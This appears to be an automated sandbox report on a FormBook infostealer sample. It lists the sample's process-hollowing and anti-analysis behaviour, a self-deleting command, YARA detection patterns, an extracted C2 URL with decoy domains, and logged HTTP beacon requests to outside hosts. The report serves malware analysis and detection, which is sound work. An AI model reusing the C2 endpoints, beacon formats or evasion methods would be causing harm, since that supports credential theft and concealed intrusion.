
Analysis Report 1cec9342_by_Libranalysis

Overview

General Information

Sample Name: 1cec9342_by_Libranalysis (renamed file extension from none to exe)
Analysis ID: 412599
MD5: 1cec9342ac2c1f91201df672382672f2
SHA1: 968ab56e042035a593279775308298cfdcdc0af7
SHA256: a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 1cec9342_by_Libranalysis.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
    • 1cec9342_by_Libranalysis.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

19 further memory-dump entries are not included in this extract.

Unpacked PEs

Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

13 further unpacked-PE entries are not included in this extract.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll, Metadefender: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll, ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: 1cec9342_by_Libranalysis.exe, Virustotal: Detection: 54%
Source: 1cec9342_by_Libranalysis.exe, Metadefender: Detection: 20%
Source: 1cec9342_by_Libranalysis.exe, ReversingLabs: Detection: 82%
Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 1cec9342_by_Libranalysis.exe, Joe Sandbox ML: detected
Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1cec9342_by_Libranalysis.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 1cec9342_by_Libranalysis.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP, source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP, source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: 1cec9342_by_Libranalysis.exe, wlanext.exe
Source: Binary string: wlanext.pdb, source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL, source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb, source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_004027A1 FindFirstFileA,
Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop ebx

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.nobleandmarble.com/or4i/
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1 | Host: www.healshameyoga.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1 | Host: www.rogersbeefarm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1 | Host: www.nowhealthdays.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1 | Host: www.ikeberto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1 | Host: www.directflence.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1 | Host: www.mmgenius.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1 | Host: www.rainboxs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1 | Host: www.nobleandmarble.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1 | Host: www.safegrinder.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1 | Host: www.tecquestrian.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1 | Host: www.booweats.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1 | Host: www.cuntrera.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1 | Host: www.changethecompany.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 3.16.197.4
Source: Joe Sandbox View, IP Address: 23.227.38.74
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: unknown, DNS traffic detected: queries for: www.healshameyoga.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | date: Wed, 12 May 2021 18:03:26 GMT | server: Apache | accept-ranges: bytes | transfer-encoding: chunked | content-type: text/html | connection: close | Data Raw: 32 31 36 38 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a
Source: wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmp, String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: 1cec9342_by_Libranalysis.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 1cec9342_by_Libranalysis.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.656903720.0000000002B50000.00000002.00000001.sdmp, String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
